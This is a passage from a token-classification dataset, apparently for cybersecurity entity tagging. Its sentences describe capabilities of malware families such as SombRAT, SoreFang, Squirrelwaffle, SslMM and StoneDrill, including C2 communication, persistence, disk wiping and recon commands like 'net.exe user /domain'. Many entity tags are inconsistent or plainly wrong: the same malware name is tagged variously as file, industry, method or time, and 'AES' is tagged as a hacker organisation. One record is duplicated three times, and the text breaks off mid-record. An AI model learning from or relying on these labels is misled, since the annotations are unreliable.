"database", - "under", - "the", - "%TEMP%", - "directory." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SombRAT", - "can", - "use", - "a", - "legitimate", - "process", - "name", - "to", - "hide", - "itself." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SombRAT", - "has", - "the", - "ability", - "to", - "respawn", - "itself", - "using", - "<code>ShellExecuteW</code>", - "and", - "<code>CreateProcessW</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "SombRAT", - "has", - "the", - "ability", - "to", - "use", - "TCP", - "sockets", - "to", - "send", - "data", - "and", - "ICMP", - "to", - "ping", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "I-Features", - "I-Features", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SombRAT", - "can", - "encrypt", - "strings", - "with", - "XOR-based", - "routines", - "and", - "use", - "a", - "custom", - "AES", - "storage", - "format", - "for", - "plugins,", - "configuration,", - "C2", - "domains,", - "and", - "harvested", - "data." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Tool", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "SombRAT", - "has", - "the", - "ability", - "to", - "modify", - "its", - "process", - "memory", - "to", - "hide", - "process", - "command-line", - "arguments." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SombRAT", - "can", - "use", - "the", - "<code>getprocesslist</code>", - "command", - "to", - "enumerate", - "processes", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SombRAT", - "has", - "the", - "ability", - "to", - "use", - "an", - "embedded", - "SOCKS", - "proxy", - "in", - "C2", - "communications." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SombRAT", - "has", - "encrypted", - "its", - "C2", - "communications", - "with", - "AES." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "SombRAT", - "can", - "execute", - "<code>getinfo</code>", - "to", - "enumerate", - "the", - "computer", - "name", - "and", - "OS", - "version", - "of", - "a", - "compromised", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SombRAT", - "can", - "execute", - "<code>getinfo</code>", - "to", - "identify", - "the", - "username", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SombRAT", - "can", - "enumerate", - "services", - "on", - "a", - "victim", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SombRAT", - "can", - "execute", - "<code>getinfo</code>", - "to", - "discover", - "the", - "current", - "time", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SoreFang", - "can", - "decode", - "and", - "decrypt", - "exfiltrated", - "data", - "sent", - "to", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SoreFang", - "can", - "enumerate", - "domain", - "accounts", - "via", - "<code>net.exe", - "user", - "/domain</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SoreFang", - "can", - "enumerate", - "domain", - "groups", - "by", - "executing", - "<code>net.exe", - "group", - "/domain</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SoreFang", - "can", - "gain", - "access", - "by", - "exploiting", - "a", - "Sangfor", - "SSL", - "VPN", - "vulnerability", - "that", - "allows", - "for", - "the", - "placement", - "and", - "delivery", - "of", - "malicious", - "update", - "binaries." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "B-Exp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SoreFang", - "has", - "the", - "ability", - "to", - "list", - "directories." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "SoreFang", - "can", - "download", - "additional", - "payloads", - "from", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O" - ] - }, - { - "tokens": [ - "SoreFang", - "can", - "collect", - "usernames", - "from", - "the", - "local", - "system", - "via", - "<code>net.exe", - "user</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "SoreFang", - "has", - "the", - "ability", - "to", - "encode", - "and", - "RC6", - "encrypt", - "data", - "sent", - "to", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SoreFang", - "can", - "enumerate", - "processes", - "on", - "a", - "victim", - "machine", - "through", - "use", - "of", - "Tasklist." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "SoreFang", - "can", - "gain", - "persistence", - "through", - "use", - "of", - "scheduled", - "tasks." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SoreFang", - "can", - "collect", - "the", - "hostname,", - "operating", - "system", - "configuration,", - "product", - "ID,", - "and", - "disk", - "space", - "on", - "victim", - "machines", - "by", - "executing", - "Systeminfo." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SoreFang", - "can", - "collect", - "the", - "TCP/IP,", - "DNS,", - "DHCP,", - "and", - "network", - "adapter", - "configuration", - "on", - "a", - "compromised", - "host", - "via", - "<code>ipconfig.exe", - "/all</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "SoreFang", - "can", - "use", - "HTTP", - "in", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Spark", - "has", - "used", - "a", - "custom", - "XOR", - "algorithm", - "to", - "decrypt", - "the", - "payload." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "B-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Spark", - "has", - "exfiltrated", - "data", - "over", - "the", - "C2", - "channel." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Spark", - "has", - "been", - "packed", - "with", - "Enigma", - "Protector", - "to", - "obfuscate", - "its", - "contents." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Spark", - "has", - "encoded", - "communications", - "with", - "the", - "C2", - "server", - "with", - "base64." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Spark", - "can", - "collect", - "the", - "hostname,", - "keyboard", - "layout,", - "and", - "language", - "from", - "the", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Spark", - "has", - "checked", - "the", - "results", - "of", - "the", - "<code>GetKeyboardLayoutList</code>", - "and", - "the", - "language", - "name", - "returned", - "by", - "<code>GetLocaleInfoA</code>", - "to", - "make", - "sure", - "they", - "contain", - "the", - "word", - "“Arabic”", - "before", - "executing." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Spark", - "has", - "run", - "the", - "whoami", - "command", - "and", - "has", - "a", - "built-in", - "command", - "to", - "identify", - "the", - "user", - "logged", - "in." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Spark", - "has", - "used", - "a", - "splash", - "screen", - "to", - "check", - "whether", - "an", - "user", - "actively", - "clicks", - "on", - "the", - "screen", - "before", - "running", - "malicious", - "code." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Spark", - "has", - "used", - "HTTP", - "POST", - "requests", - "to", - "communicate", - "with", - "its", - "C2", - "server", - "to", - "receive", - "commands." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Spark", - "can", - "use", - "cmd.exe", - "to", - "run", - "commands." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SpeakUp", - "uses", - "Perl", - "scripts." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "SpeakUp", - "uses", - "cron", - "tasks", - "to", - "ensure", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SpeakUp", - "encodes", - "its", - "second-stage", - "payload", - "with", - "Base64." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "SpeakUp", - "attempts", - "to", - "exploit", - "the", - "following", - "vulnerabilities", - "in", - "order", - "to", - "execute", - "its", - "malicious", - "script:", - "CVE-2012-0874,", - "CVE-2010-1871,", - "CVE-2017-10271,", - "CVE-2018-2894,", - "CVE-2016-3088,", - "JBoss", - "AS", - "3/4/5/6,", - "and", - "the", - "Hadoop", - "YARN", - "ResourceManager." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-Features", - "B-Features", - "B-Features", - "B-Features", - "B-Way", - "O", - "O", - "O", - "O", - "B-Idus", - "B-SecTeam", - "B-SecTeam" - ] - }, - { - "tokens": [ - "SpeakUp", - "deletes", - "files", - "to", - "remove", - "evidence", - "on", - "the", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SpeakUp", - "downloads", - "and", - "executes", - "additional", - "files", - "from", - "a", - "remote", - "server." - ], - "ner_tags": [ - "B-Idus", - "B-Features", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SpeakUp", - "checks", - "for", - "availability", - "of", - "specific", - "ports", - "on", - "servers." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SpeakUp", - "can", - "perform", - "brute", - "forcing", - "using", - "a", - "pre-defined", - "list", - "of", - "usernames", - "and", - "passwords", - "in", - "an", - "attempt", - "to", - "log", - "in", - "to", - "administrative", - "panels." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SpeakUp", - "uses", - "Python", - "scripts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SpeakUp", - "encodes", - "C&C", - "communication", - "using", - "Base64." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "SpeakUp", - "uses", - "the", - "<code>cat", - "/proc/cpuinfo", - "|", - "grep", - "-c", - "“cpu", - "family”", - "2>&1</code>", - "command", - "to", - "gather", - "system", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SpeakUp", - "uses", - "the", - "<code>ifconfig", - "-a</code>", - "command." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SpeakUp", - "uses", - "the", - "<code>arp", - "-a</code>", - "command." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SpeakUp", - "uses", - "the", - "<code>whoami</code>", - "command." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "SpeakUp", - "uses", - "POST", - "and", - "GET", - "requests", - "over", - "HTTP", - "to", - "communicate", - "with", - "its", - "main", - "C&C", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SpicyOmelette", - "has", - "been", - "signed", - "with", - "valid", - "digital", - "certificates." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SpicyOmelette", - "has", - "collected", - "data", - "and", - "other", - "information", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SpicyOmelette", - "can", - "download", - "malicious", - "files", - "from", - "threat", - "actor", - "controlled", - "AWS", - "URL's." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SpicyOmelette", - "has", - "the", - "ability", - "to", - "execute", - "arbitrary", - "JavaScript", - "code", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SpicyOmelette", - "has", - "been", - "executed", - "through", - "malicious", - "links", - "within", - "spearphishing", - "emails." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "SpicyOmelette", - "can", - "identify", - "payment", - "systems,", - "payment", - "gateways,", - "and", - "ATM", - "systems", - "in", - "compromised", - "environments." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "I-Idus", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SpicyOmelette", - "can", - "check", - "for", - "the", - "presence", - "of", - "29", - "different", - "antivirus", - "tools." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SpicyOmelette", - "can", - "enumerate", - "running", - "software", - "on", - "a", - "targeted", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SpicyOmelette", - "has", - "been", - "distributed", - "via", - "emails", - "containing", - "a", - "malicious", - "link", - "that", - "appears", - "to", - "be", - "a", - "PDF", - "document." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "SpicyOmelette", - "can", - "identify", - "the", - "system", - "name", - "of", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SpicyOmelette", - "can", - "identify", - "the", - "IP", - "of", - "a", - "compromised", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Squirrelwaffle", - "has", - "encrypted", - "collected", - "data", - "using", - "a", - "XOR-based", - "algorithm." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Squirrelwaffle", - "has", - "decrypted", - "files", - "and", - "payloads", - "using", - "a", - "XOR-based", - "algorithm." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Squirrelwaffle", - "has", - "been", - "obfuscated", - "with", - "a", - "XOR-based", - "algorithm." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Squirrelwaffle", - "has", - "exfiltrated", - "victim", - "data", - "using", - "HTTP", - "POST", - "requests", - "to", - "its", - "C2", - "servers." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Squirrelwaffle", - "has", - "downloaded", - "and", - "executed", - "additional", - "encoded", - "payloads." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Squirrelwaffle", - "has", - "relied", - "on", - "users", - "enabling", - "malicious", - "macros", - "within", - "Microsoft", - "Excel", - "and", - "Word", - "attachments." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O", - "O", - "B-Tool", - "B-Way" - ] - }, - { - "tokens": [ - "Squirrelwaffle", - "has", - "relied", - "on", - "victims", - "to", - "click", - "on", - "a", - "malicious", - "link", - "send", - "via", - "phishing", - "campaigns." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "B-OffAct" - ] - }, - { - "tokens": [ - "Squirrelwaffle", - "has", - "used", - "PowerShell", - "to", - "execute", - "its", - "payload." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Squirrelwaffle", - "has", - "been", - "executed", - "using", - "`regsvr32.exe`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Squirrelwaffle", - "has", - "been", - "executed", - "using", - "`rundll32.exe`." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Squirrelwaffle", - "has", - "been", - "packed", - "with", - "a", - "custom", - "packer", - "to", - "hide", - "payloads." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Squirrelwaffle", - "has", - "been", - "distributed", - "via", - "malicious", - "Microsoft", - "Office", - "documents", - "within", - "spam", - "emails." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "I-Way", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Squirrelwaffle", - "has", - "been", - "distributed", - "through", - "phishing", - "emails", - "containing", - "a", - "malicious", - "URL." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Squirrelwaffle", - "has", - "encoded", - "its", - "communications", - "to", - "C2", - "servers", - "using", - "Base64." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Squirrelwaffle", - "has", - "gathered", - "victim", - "computer", - "information", - "and", - "configurations." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Squirrelwaffle", - "has", - "collected", - "the", - "victim’s", - "external", - "IP", - "address." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Squirrelwaffle", - "can", - "collect", - "the", - "user", - "name", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Squirrelwaffle", - "has", - "contained", - "a", - "hardcoded", - "list", - "of", - "IP", - "addresses", - "to", - "block", - "that", - "belong", - "to", - "sandboxes", - "and", - "analysis", - "platforms." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Squirrelwaffle", - "has", - "used", - "malicious", - "VBA", - "macros", - "in", - "Microsoft", - "Word", - "documents", - "and", - "Excel", - "spreadsheets", - "that", - "execute", - "an", - "`AutoOpen`", - "subroutine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "I-SamFile", - "I-SamFile", - "I-SamFile", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Squirrelwaffle", - "has", - "used", - "HTTP", - "POST", - "requests", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Squirrelwaffle", - "has", - "used", - "`cmd.exe`", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "SslMM", - "contains", - "a", - "feature", - "to", - "manipulate", - "process", - "privileges", - "and", - "tokens." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "B-HackOrg" - ] - }, - { - "tokens": [ - "SslMM", - "identifies", - "and", - "kills", - "anti-malware", - "processes." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SslMM", - "has", - "a", - "hard-coded", - "primary", - "and", - "backup", - "C2", - "string." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SslMM", - "creates", - "a", - "new", - "thread", - "implementing", - "a", - "keylogging", - "facility", - "using", - "Windows", - "Keyboard", - "Accelerators." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "To", - "establish", - "persistence,", - "SslMM", - "identifies", - "the", - "Start", - "Menu", - "Startup", - "directory", - "and", - "drops", - "a", - "link", - "to", - "its", - "own", - "executable", - "disguised", - "as", - "an", - "“Office", - "Start,”", - "“Yahoo", - "Talk,”", - "“MSN", - "Gaming", - "Z0ne,”", - "or", - "“MSN", - "Talk”", - "shortcut." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-Idus", - "O", - "B-Idus", - "B-SecTeam", - "O", - "B-SamFile", - "B-SecTeam", - "O" - ] - }, - { - "tokens": [ - "To", - "establish", - "persistence,", - "SslMM", - "identifies", - "the", - "Start", - "Menu", - "Startup", - "directory", - "and", - "drops", - "a", - "link", - "to", - "its", - "own", - "executable", - "disguised", - "as", - "an", - "“Office", - "Start,”", - "“Yahoo", - "Talk,”", - "“MSN", - "Gaming", - "Z0ne,”", - "or", - "“MSN", - "Talk”", - "shortcut." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-Idus", - "O", - "B-Idus", - "B-SecTeam", - "O", - "B-SamFile", - "B-SecTeam", - "O" - ] - }, - { - "tokens": [ - "To", - "establish", - "persistence,", - "SslMM", - "identifies", - "the", - "Start", - "Menu", - "Startup", - "directory", - "and", - "drops", - "a", - "link", - "to", - "its", - "own", - "executable", - "disguised", - "as", - "an", - "“Office", - "Start,”", - "“Yahoo", - "Talk,”", - "“MSN", - "Gaming", - "Z0ne,”", - "or", - "“MSN", - "Talk”", - "shortcut." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-Idus", - "O", - "B-Idus", - "B-SecTeam", - "O", - "B-SamFile", - "B-SecTeam", - "O" - ] - }, - { - "tokens": [ - "SslMM", - "sends", - "information", - "to", - "its", - "hard-coded", - "C2,", - "including", - "OS", - "version,", - "service", - "pack", - "information,", - "processor", - "speed,", - "system", - "name,", - "and", - "OS", - "install", - "date." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SslMM", - "sends", - "the", - "logged-on", - "username", - "to", - "its", - "hard-coded", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Starloader", - "decrypts", - "and", - "executes", - "shellcode", - "from", - "a", - "file", - "called", - "Stars.jps." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Starloader", - "has", - "masqueraded", - "as", - "legitimate", - "software", - "update", - "packages", - "such", - "as", - "Adobe", - "Acrobat", - "Reader", - "and", - "Intel." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "StoneDrill", - "has", - "a", - "disk", - "wiper", - "module", - "that", - "targets", - "files", - "other", - "than", - "those", - "in", - "the", - "Windows", - "directory." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StoneDrill", - "can", - "wipe", - "the", - "accessible", - "physical", - "or", - "logical", - "drives", - "of", - "the", - "infected", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StoneDrill", - "can", - "wipe", - "the", - "master", - "boot", - "record", - "of", - "an", - "infected", - "computer." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StoneDrill", - "has", - "obfuscated", - "its", - "module", - "with", - "an", - "alphabet-based", - "table", - "or", - "XOR", - "encryption." - ], - "ner_tags": [ - 